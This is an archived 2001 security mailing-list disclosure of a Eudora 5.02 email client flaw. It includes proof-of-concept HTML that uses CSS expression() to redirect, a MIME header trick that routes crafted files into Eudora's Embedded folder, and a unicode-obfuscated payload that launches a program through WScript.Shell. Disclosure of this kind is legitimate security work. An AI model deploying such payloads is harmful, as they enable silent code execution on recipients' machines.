Re: feeble.you!dora.exploit

["http-equiv () excite com" <http-equiv () excite com>]

Further to all of this, we include a generic more illustrative (and user
friendly test working example) [at the end of this batch of quotes].

This defeats the so-called "Allow executables in HTML content" being
disabled.

Example at the end of this screed.

On Tue, 20 Mar 2001 11:23:48 -0800 (PST), http-equiv () excite com wrote:

|  |Jeff Beckley wrote:
|  |
|  |>At 01:38 AM 3/18/2001 -0800, http-equiv () excite com wrote:
|  |>Silent delivery and installation of an executable on a target
|  |>computer. No client input other than opening an email using
|  |>Eudora 5.02 - Sponsored Mode provided 'use Microsoft viewer'
|  |>and 'allow executables in HTML content' are enabled.
|  |
|  |
|  |The "Allow executables in HTML content" setting is turned off by
|  |default.  The online help and user manual mention that the
|  |setting should remain off for security reasons.
|
|  This of course is 100% correct. Unfortunately on closer   |  examination
we find
|  that this too can be defeated quite easily.  Consider the following
|  non-JavaScript:
|
|
|  <!doctype html public "-//w3c//dtd html 4.0 transitional//en">
|
|  <img
SRC="file://C:\WINDOWS\APPLIC~1\QUALCOMM\EUDORA\Embedded\malware.gif"
|  height=2 width=2
|  STYLE="left:expression(location.href='http://www.malware.com&apos;);"></html>
|
|  <br>
|  <br>
|  </body></html>
|
|  This slips through, with "Allow executables in HTML content" |disabled.
|  therefore the results will be the same:
|
|  <img SRC="" height=1 width=1
|  STYLE="left:expression (malware.location.href='cid:malware.com');"></
|
|  ...etc
|
|  Disable the 'Microsoft Viewer" thing. That's the problem.
|
|  A good repair can be by reviewing all the necessary tricks to inject
|  JavaScript into Hotmail Accounts. These are well documented here and
dating
|  back for quite some time. It appears the mail client seeks typical script
|  tags, which is defeated as above.  Additional you might want to not allow
a
|  crafted inline file to transfer automatically to your embedded folder:
|
|  Content-Type: application/octet-stream; charset=iso-8859-1
|  Content-ID: <malware.com>
|  Content-Transfer-Encoding: base64
|  Content-Disposition: inline; filename="You!DORA.html"
|
|  We note that if the content-type is manipulated we can route the file to
the
|  'Embedded' folder. Casual observation suggests image files and *.exe are
|  routed there. While *.html is not, hence the constructed Content-Type:
|  application/octet-stream; charset=iso-8859-1 while the file is:
|  Content-Disposition: inline; filename="You!DORA.html"
|
|
|  ---
|  http://www.malware.com
|
|

This is specifically constructed to fire the ActiveX warning so that it is
visually illustrated (harmless WSH to fire telnet if you click okay)

REPEAT: this is by design and only for illustrative purposes (lest some
idiot complain this demo has a warning and is a lame "exploit").

  <img SRC="cid:malware.com" height=2 width=2
STYLE="left:expression(document.write('\u0020\u0020\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u0076\u0061\u0072\u0020\u0077\u0073\u0068\u003d\u006e\u0065\u0077\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0027\u0057\u0053\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0068\u0065\u006c\u006c\u0027\u0029\u003b\u0020\u0020\u0077\u0073\u0068\u002e\u0052\u0075\u006e\u0028\u0027\u0074\u0065\u006c\u006e\u0065\u0074\u002e\u0065\u0078\u0065\u0027\u0029\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u003c\u0021\u002d\u002d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0061\u006c\u0077\u0061\u0072\u0065\u002e\u0063\u006f\u006d\u0020\u0032\u0032\u002e\u0030\u0032\u002e\u0030\u0031\u0020\u002d\u002d\u003e'))">

Once again:

Tested on win98, IE5.5, "Eudora 5.0.2 -- Sponsored Mode", "Microsoft Viewer"
enabled, "Allow executables in HTML content" DISABLED.


end call

---
http://www.malware.com






_______________________________________________________
Send a cool gift with your E-Card
http://www.bluemountain.com/giftcenter/